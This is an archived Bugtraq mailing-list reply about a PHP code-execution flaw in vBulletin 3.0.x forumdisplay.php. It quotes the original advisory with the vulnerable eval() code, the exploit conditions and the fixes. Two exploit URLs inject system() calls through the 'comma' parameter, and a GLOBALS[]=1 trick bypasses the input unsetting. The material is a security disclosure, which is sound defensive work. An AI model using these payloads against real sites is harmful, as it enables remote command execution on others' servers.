Bugtraq mailing list archives

Re: vbulletin 3.0.x PHP code execution

From: pokley <pokleyzz () scan-associates net>
Date: Tue, 15 Feb 2005 11:30:50 +0800

On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb () uk2 net> wrote:

The 4th condition is the most hard to find condition in php installation.There is a technique to by pass magic quote condition by supplying nestedvariable to $comma. Since I've no vbulletin source code to test with thistechnique is not confirmed in this vulnerability.


example:
        http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma={$func($comm)}&func=system&comm=id

It is never tested to real



Vulnerable Systems:
 ----------------
 vBulletin version 3.0 up to and including version 3.0.4

 Immune systems:
 ----------------
 vBulletin version 3.0.5
 vBulletin version 3.0.6

 Vulnerable code in forumdisplay.php :
 #############################################################
 if ($vboptions['showforumusers'])
 {
    .
    .
    .
    .

 if ($bbuserinfo['userid'])
 {
    .
    .
    .
    .
    $comma = ', ';
  }
 .
 .
 .
 .
 while ($loggedin = $DB_site->fetch_array($forumusers))
 {
    .
    .
    .

eval('$activeusers .= "' . $comma .fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)

    $comma = ', ';
    .
    .
  }
 .
 .
 }

 #############################################################

 Conditions:
 ----------------

1st condition : $vboptions['showforumusers'] == True , the admin mustset

showforumusers ON in vbulletin options.

2nd condition : $bbuserinfo['userid'] == 0 , you must be anvisitor/guest

.
 3rd condition  : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it  must has at least one user show the forum.
 4th condition   : magic_quotes_gpc must be OFF
 SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))


 Solutions:
 ----------------
 * Disable showforumusers in vbulletin options .
 * add the next line before if ($vboptions['showforumusers'])
     $comma = '';

 Exploit:
 ----------------
example :
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."




--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/

Current thread:

vbulletin 3.0.x PHP code execution AL3NDALEEB (Feb 14)
- Re: vbulletin 3.0.x PHP code execution pokley (Feb 15)
- Re: vbulletin 3.0.x PHP code execution pokley (Feb 16)
- <Possible follow-ups>
- Re: vbulletin 3.0.x PHP code execution AL3NDALEEB . (Feb 16)